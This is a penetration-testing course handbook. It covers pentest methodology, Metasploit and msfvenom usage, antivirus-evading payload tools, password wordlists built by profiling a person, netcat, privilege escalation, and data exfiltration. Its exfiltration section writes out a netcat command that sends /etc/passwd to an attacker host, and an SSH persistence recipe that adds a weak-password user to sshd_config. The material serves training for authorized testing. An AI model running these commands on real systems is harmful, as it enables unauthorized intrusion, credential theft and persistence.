technical foundations linux & networking...differences when exploiting different targets (such...

Penetration Testing - Course Handbook

Technical Foundations Linux & Networking

Baruch Garcia-Gallo

1 | WYWM Penetration Testing Module Handbook

Table of Contents

Pentest .............................................................................................................................................. 2

Methodology ................................................................................................................................. 2

Exploitation ................................................................................................................................... 2

What you need to know about exploitation ............................................................................... 3

Metasploit ................................................................................................................................. 4

Finding Published Exploits .......................................................................................................... 8

Available and Custom Created Wordlists for Brute-forcing ......................................................... 9

Wordlists Available on Kali ......................................................................................................... 9

Generating Custom Wordlists .................................................................................................. 10

Netcat...................................................................................................................................... 12

Post Exploitation.......................................................................................................................... 12

Privilege Escalation .................................................................................................................. 12

Data Exfiltration ....................................................................................................................... 14

Clean-up .................................................................................................................................. 15


Pentest A Penetration Test is the process of compromising/exploiting a target machine to gain root/admin

privileges and download/exfiltrate company data. A penetration test (pentest) is conducted after

vulnerability discovery has been conducted during a VA.

You will be required to follow the pentest by developing a detailed report, which will be of high

value to the company hiring your services.

The report will outline the following:

• Exploitation method

• Data exfiltrated

• Affected systems

• How the client may remediate the issues found

Methodology Reading the RoE/scope and conduction a vulnerability assessment (excluding report writing) are

both to be completed before continuing with the penetration test.

Pentest Methodology

1. Exploitation Compromise target system

2. Privilege Escalation Gain root/admin access

3. Data Exfiltration Extract private information

4. Clean-Up Remove any uploaded files including backdoors etc

5. Report Writing It’s all about suppling this end product

Exploitation You can Exploit a system not only through published vulnerabilities but also due to service

misconfigurations. For example, an ftp service might have anonymous user login enabled and allow

file uploads using anonymous login. This is not a vulnerability as it is just how the service normally

runs. However, it is a poorly designed component of the service – a misconfiguration of the service

that could allow an attacker to gain a foothold onto the target. So, although we need to focus on

vulnerability research we also need to look at how each service is configured when attempting to

exploit a target.


What you need to know about exploitation The goal of exploiting a system (And ultimately a penetration test) is to gain access to a target system

and be able to exfiltrate sensitive data from the client’s network. By exfiltrating business critical

sensitive data, you clearly show a company how their security posture is lacking and provide a means

to improve their security.

How to exploit a system

To exploit a system, you need to have a way of directly interacting with the target. In computing a

shell is an interface in which you can interact with a machine. The command line interface in kali is a

shell (BASH stands for born again shell). When you hear pentester’s speaking about getting shells

what they mean is that they want to have a direct interface whereby they can interact with the target.

Obviously, it is important to gain a direct interface with a target as it provides a possible means to

read, write, delete and copy data on the target system.

Now that you know what a shell is and that you want to get a shell (have access to an interface

whereby you can interact with the target), you may be asking “how do I get a shell?”. To get a shell

you need to put what’s called a “payload” onto the target system.

A payload is a file containing code that runs given commands once on the target system. These

commands might be to create a shell (an interface) that can be sent back to us. From here we can

interact with the target system through the shell – much like we have like we have interacted with

our local Kali machine through the command line interface.


There are different types of shells that behave in different ways – bind shells and reverse shells.

Reverse shells – are interfaces that are sent back to our machine. All we have to do is “catch” this

incoming connection (with netcat or Metasploit’s Multihandler)

Bind shells – are interfaces that connect to outward facing ports on the target machine. We must

then connect to the given port on the target manually from our machine to access the shell

(interface).

• Note that getting a shell on the target system is not the only means of data exfiltration but it

is the most versatile and complete way of having the ability to access all data on the target.

That is why getting a remote shell is highly sort after when conducting a penetration test.

Getting a Payload on the Target

The first stage of getting a shell is to get a payload on the target system. There are many ways to get

a payload on the target machine or network. These can include sending phishing emails, watering hole

attacks, USB drops or even using discovered vulnerabilities or misconfigurations in software or

services to upload the payload directly to the target. Finding a way to get a payload onto the target

device or network is the part of the penetration testing process that takes the largest amount of

knowledge, skills and creativity.

Metasploit Metasploit is a framework used to automate the exploitation of a target. Metasploit has a large range

of exploitation modules that automatically run exploits against known vulnerabilities on a selected

target – you only need to set a few options to be able to run one of these exploit modules. Metasploit

also contains auxiliary modules which can assist in the enumeration of a target. The rapid 7 and

offensive security web sites have information regarding Metasploit modules to use for the exploitation

of specific vulnerabilities. It is still important for you to understand the inner workings of an exploit

when running Metasploit exploit modules, as fully understanding how they work means that when

unexpected errors occur you can troubleshoot them successfully.

To start Metasploit you must first start the postgresql service to enable quicker searching when using

Metasploit.


To set-up Metasploit type the following command: service postgresql start

to start Metasploit use the command: msfconsole

From here Metasploit opens and you can begin by searching for modules to use. You can search for

modules using the search command alongside a service/software name that you are using. Metasploit

has multiple module types available. The main modules you will be using during a penetration test

and even a vulnerability assessment are:

• Auxiliary Modules – These modules assist in service enumeration and discovering software

misconfigurations

• Post Exploitation Modules – These modules are to be used once access to a system has been

gained but you do not have full privileges on the system. These modules assist in privilege

escalation.

• Exploit Modules – These modules assist in the exploitation of a known vulnerability.

Example searching for modules related to specific software type: search proftpd

From here you will have a list of proftpd modules within the Metasploit framework.

You can get information about each module by using the info command.

Example of info command: info exploit/unix/ftp/proftpd_133c_backdoor


Once you have decided on which module you wish to choose you need to select it. To select an exploit

module you call the use command: use exploit/unix/ftp/proftpd_133c_backdoor

Once you have loaded a module you can then see all options that are available to be set in the loaded

module.

In the basic options section you can see which options are required for the module to work properly

– these will be marked as yes under required.

In some exploit modules you can change the payload and targets. As some modules may have options

differences when exploiting different targets (such as a Windows or Linux target).

To change the target use the command:

show targets

As you can see with the proftpd backdoor exploit the target is set automatically with an id of 0. In this

instance, you can only select one operating system or software option to set as the designated target.


Below you will see an example of show target for the recent eternal blue exploit – in this instance you

can see this exploit will only be effective against windows server 2008 R2 x64 or Windows 7 machines.

Metasploit command Examples Description

set Set payload

Set rhost

Set lport

Sets individual exploit options

show Show options

Show targets

Show payloads

Provides a list of options,

targets or payloads for a specific

module

use Use <module name> Select a module to use

search Search <service/software name> Search for modules related to

specific software or service

use exploit/multi/handler A handler to catch a payload as it connects back to

your local machine. (much like netcat)

Catch a connection coming back

to the local host from a payload

Creating your own payload

Although Kali has many inbuilt webshells that you can use as required (in the /usr/share/webshells/

directory).


You can also use msfvenom to create payloads that given certain vulnerabilities or misconfigurations

are present may mean that you can upload these payloads directly onto the target. Msfvenom works

by generating shellcode for you. Another tool for shell code generation is Veil-Ordnance, part of the

veil framework.

Msfvenom can also encode your payloads to hide them from antivirus however as most AV solutions

pick up msfvenom payloads because they use a base template which can be easily detected. Other

encoders include Ps1encode for powershell based payloads and Veil-evasion as part of the veil

framework. Veil generates shellcode that can bypass most anti-virus solutions.

Msfvenom is already preinstalled on kali (see msfvenom cheat sheet for usage), however you can

install Veil easily by using the command:

git clone https://github.com/Veil-Framework/Veil

As you can see above Veil-ordnance and Veil-evasion are in the Veil Tools directory, ready for use.

Finding Published Exploits When using exploits, you should use exploits that come from a reliable source such as exploit-db or

you should be able to look at the exploit code and understand how the exploit works. This is because

some exploits may harbor malicious code which you obviously do not want to introduce into a client’s

network.

Exploits archived on Offensive Security’s Exploit Database are peer reviewed and reliable and

therefore can be used during a penetration test.

Exploit-db – https://www.exploit-db.com/

Shodan exploits - https://exploits.shodan.io/welcome

Packetstorm - https://packetstormsecurity.com/files/tags/exploit/

https://www.exploit-db.com/

https://exploits.shodan.io/welcome

https://packetstormsecurity.com/files/tags/exploit/


However, sometimes these exploits are only usable for a specific target type (such as windows server

2010 and earlier) even though later windows server versions may be vulnerable to the specific

vulnerability that the exploit targets. In this instance to exploit a vulnerable windows server 2016

machine you would have to edit the exploit. This is true for the eternal blue vulnerability which effects

windows machines running SMBv1.

Available and Custom Created Wordlists for Brute-forcing When brute-forcing usernames, passwords or directories you can use wordlists. Many wordlists are

available in Kali, available for download online and you can also create your own custom wordlists

using tools in Kali.

Wordlists Available on Kali Below is a table of wordlists available in Kali and where to find them.

Wordlist Type Wordlist File Names Use of Wordlist

Password List Rockyou.txt

Adobe_top100_pass.txt

Idrac_default_pass.txt

Hci_oracle_passwords.txt

http_default_pass.txt

default_pass_for_services_unhash.txt

db2_default_pass.txt

ipmp_passwords.txt

mirai_passwords.txt

multi_vendor_cctv_dvr_pass.txt

snmp_default_pass.txt

vnc_passwords.txt

tomcat_mgr_default_pass.txt

postgres_default_pass.txt

passwords.lst

oracle_default_passwords.csv

Unix_passwords.txt

/usr/share/worlists/

/usr/share/wordlists/metasploitq

Directory Lists Small.txt

big.txt, best1050.txt

best110.txt

best15.txt

/usr/share/wordlists/dirb/others

First Names Names.txt /usr/share/wordlists/dirb/others


Webserver

specific

Directories and

Files list

Apache.txt,

coldfusion.txt,

axis.txt,

cgis.txt,

domino.txt,

fatwire_pagenames.txt,

fatwire.txt,

frontpage.txt,

hpsmh.txt,

hyperion.txt,

iis.txt,

iplanet.txt,

jboss.txt,

jersey.txt,

jrun.txt,

netware.txt,

oracle.txt,

ror.txt,

sap.txt,

sharepoint.txt,

sunas.txt,

test.txt,

tomcat.txt,

vignette.txt,

weblogic.txt,

websphere.txt

/usr/share/worlists/dirb/vulns

Linux Sensitive

Files

Sensitive_files.txt /usr/share/wordlists/metasploit

Generating Custom Wordlists To have a higher chance of success during brute force attacks you can create your own custom

password lists. Many people create passwords that relate personally to them so that they have a

higher chance of remembering their password. In this way you can generate custom password lists

based on a person’s birthdays, pets, family, likes, dislikes and so on.

CeWL

CeWL stands for custom wordlist generator and as the name suggests generates custom wordlists.

CeWL crawls a given webpage and makes a wordlist based on specified parameters. You can specify

any webpage including a target individual’s social media accounts or webpages of interest to the

individual. As an example, imagine you are on a pentest and you know the network administrator is

obsessed with ‘The Beatles’. Thinking that he has incorporated this into his password you could use

the following CeWL command:


cewl https://en.wikipedia.org/wiki/The_Beatles -d 1 -m 5 -w beatlesPassList.txt

In this CeWL is generating a wordlist called beatlesPassList.txt by crawling all words on the Beatles

Wikipedia webpage. It is only including words in the wordlist that are longer than 5 characters and is

only staying on the Wikipedia page – not crawling links from the webpage.

-d The depth CeWL will crawl in regards to links on a webpage

-m Limits to only including words with characters equal to or over the specified length

-w Outputs the wordlist into a specified file

CUPP

CUPP or common user password profiler creates a profile of the target person based on their

birthdate, pets, children, spouse and then uses this information to create a wordlist. Wordlists created

by CUPP can be used to brute force passwords for employee’s emails, ftp & ssh, web login portals and

internal system access. Below is a screenshot of the questions CUPP uses to profile an individual and

create a password list. CUPP also takes into consideration that some people may use numbers to

replace some letters within words within their password – as such CUPP wordlists contain password

variations based on this characteristic.


Netcat Netcat is considered the hacking swiss army knife. Netcat allows you to connect to open ports, view

service versions from open ports, interact with services on open ports, listen on ports on your own

machine for incoming connections, listen with programs to allow a remote connection to interact with

a given program implemented on a designated port as well as send programs to other machines

through open ports. As you can see netcat is very versatile and is a good starting point when

interacting with a service running on an open port or receiving a connection instigated by a payload

uploaded onto a remote machine by yourself during exploitation of the target.

netcat Syntax netcat <flags> <ip address or domain name> <port number>

**note. An ip address is not required if you are just listening on the local host

netcat flags

-n stands for numerical ip rather than a domain

-v verbosity (add 2 v’s for double verbosity)

This option shows more information such as ip addresses and other connection information.

Verbosity is helpful when determining the ip address of a domain obscured by a WAF.

-l Listens on a port on your local machine with netcat.

Using the -l flag, you do not need to specify an ip address as you are listening on the local host.

-p Specify a target port

Post Exploitation Once a system has been exploited and some control has been gained we move to what’s known as

post exploitation which may include uploading files and tools to the target machine, privilege

escalation, data exfiltration and the clean-up of our presence on the system, etc.

Privilege Escalation Privilege escalation (PrivEsc) is just that, the act of elevating user privileges/permissions on the target

machine, so as to gain further control of the target machine and access to confidential data. You’ll

often gain access with normal user level permissions, with the aim to then elevate these to root user

permissions.


There are numerous methods to conduct PrivEsc and they predominately fall into the following two

categories; privilege escalation exploits taking advantage of security misconfigurations. Again, the

exact methods are specific to the target environment.

In this course I’ll introduce the following PrivEsc methods, giving an example in the videos.

Kernel Exploits e.g. Dirty COW By taking advantage of kernel vulnerabilities an attacker can

potentially gain the ability to read, write, and execute arbitrary commands, with root user

permissions. Dirty COW is one such exploit and affects almost all versions of Linux since 2005. It allows

an adversary to gain high level write permissions to an otherwise read-only area of the target. And

although this exploit may cause system instability (so use with caution) I have shown it in the videos

as it’s considered one of the most important serious local Linux PrivEsc exploits.

Service Configurations Weak configurations are commonly used for PrivEsc as they are common and

have lower impact on the overall target system than kernel exploits. Listed below are some potential

methods of this.

Weak and Reused Passwords You can often PrivEsc by attempting to use weak or reused passwords

found during enumeration.

Suid/Services that Run as Root You can potentially get these services to run your commands as root.

These services may initially seem harmless however offer the ability to run scripts. E.g. Nmap, Bash,

Nano, Vim, cp.

Sudo If your current permissions on the target machine allow you to run a program using sudo then

you can potentially run commands on the target system. As discussed earlier this can be done by

typing either sudo or su before the command.

PrivEsc Tools

The above list is only an insight into possible PrivEsc methods. So with many potential methods a great

place to start, especially if you limited for time, is with automated tools. Below I’ll list a few tools for

elevating your privileges on both Linux and Windows target machines.

LinEnum Is a script that runs a range of PrivEsc checks including: Kernel details, system info,

user info, password polocies, checks for stored password hashes, privilege access, permissionis, if

current user has sudo access, lists cron jobs, checks for default and/or weak credentials, locates SUID

files and worl-writable files, NFS details, and searches log files, plus more.

LinEnum is located at https://github/rebootuser/LinEnum

e.g. Syntax: ./LinEnum.sh -k <keyword> -r <report name> -e <export location /tmp/> -t

-t = a thorough scan. Otherwise the default scan is a quick scan.

https://github/rebootuser/LinEnum


Unix-privesc-check is a script that searches for security misconfigurations which may allow and

normal user to escalate privileges. It can be used on different target machine operating systems

including Linux, Unix, and Solaris.

Unix-privesc-check located at: https://github/pentestmonkey/unix-privesc-check

Syntax: unix-privesc-check <standard or detailed>

Windows-privesc-check Offers similar functionality on Windows target systems as unix-

privesc-check does on Linux targets.

Windows-privesc-check located at: https://github.com/pentestmonkey/windows-privesc-check/

PowerSploit (PowerShell Post Exploitation Framework) Is a collection of PowerShell modules

useful during all stages of a pentest on a Windows target machine. These modules range from

reconnaissance, PrivEsc, code execution, to data exfiltration.

PowerSploit can be located at: https://github.com/PowerShellMafia/PowerSploit/

I recommend checking out the above link for more information on PowerSploit and its operation.

Data Exfiltration Data exfiltration is essentially the act of downloading data/files from the target machine. In our case,

as a pentester, this data is used as evidence to support our findings. Data can be exfiltrated using

numerous methods dependent on the target environment, some of these are listed below.

Shells certain shells such as Meterpreter (shown in video and cheat sheet) which you can simply use

standard commands to navigate through the target system. If the target system is a Windows OS you

can use PowerShell or PowerSploit (as outlined above)

Payloads Metasploit contains a range of payloads capable of exfiltrating data, e.g. backdoors

can be used to both upload and download data from the target machine.

Netcat netcat can be easily used to transfer data between the target and your machine, you can do

this with the following command.

Your machine: dir you want to save file/# nc -l -p 4444 > <filename>

Target machine: /etc/# cat passwd | nc <your IP> passwd

https://github.com/PowerShellMafia/PowerSploit/


SSH If SSH daemon is up you can create a new user and SSH into the target machine.

Check SSH is up: netstat -tulpn | grep sshd

Create new user on target machine: /usr/bin/useradd <username>

Create new users pwd on target machine: /usr/bin/passwd <username>

Set the password to something easy e.g. abc123

Add new user to SSH config file: echo>> /etc/ssh/sshd_config AllowUsers <username>

Now on your machine type: ssh <username>@<target IP> password<password you set>

FTP File Transfer Protocol can often be used to transfer files from the target machine, you may

even find anonymous FTP logins.

Hosting the files on the target machines web server

NFS Share NFS or Network File System protocol can be considered as shared file storage on the

target machine. And through the process of mounting you can potentially gain access to certain

directories such as the tmp directory.

E.g. mount <target IP>:/ /tmp/

If successful you can go to /tmp/share to view its contents.

CrackMapExec one of CrackMapExec’s functions is to gather clear-text windows credentials from a

target windows machine. It is located at https://github.com/byt3bl33d3r/CrackMapExec

I recommend going to the above link to read the documentation and instructions.

Clean-up As you could imagine leaving shells waiting for a real adversary, after the pentest is complete, is not a

good idea and as such cleaning up the target system should always be on your mind and not just an

after though. So along with the records you should already be keeping simply add notes on what

alterations were made to the system and where they were made. These recorded alterations should

include everything from users created, logs altered, payloads uploaded and more. These notes need

to be meticulous in order to prevent you missing something and compromising the target systems

security.

These notes aren’t just for your records, they will also provide administrators a list of actions to

necessary in the event that you are unable to remove a file or time constraints don’t allow you to clean

the target.

When cleaning up simply use the rm command to remove all items on your list, then undo any actions

you performed to the system. And when complete let the sys admins know what has been completed.

https://github.com/byt3bl33d3r/CrackMapExec

technical foundations linux & networking...differences when exploiting different targets (such...

Documents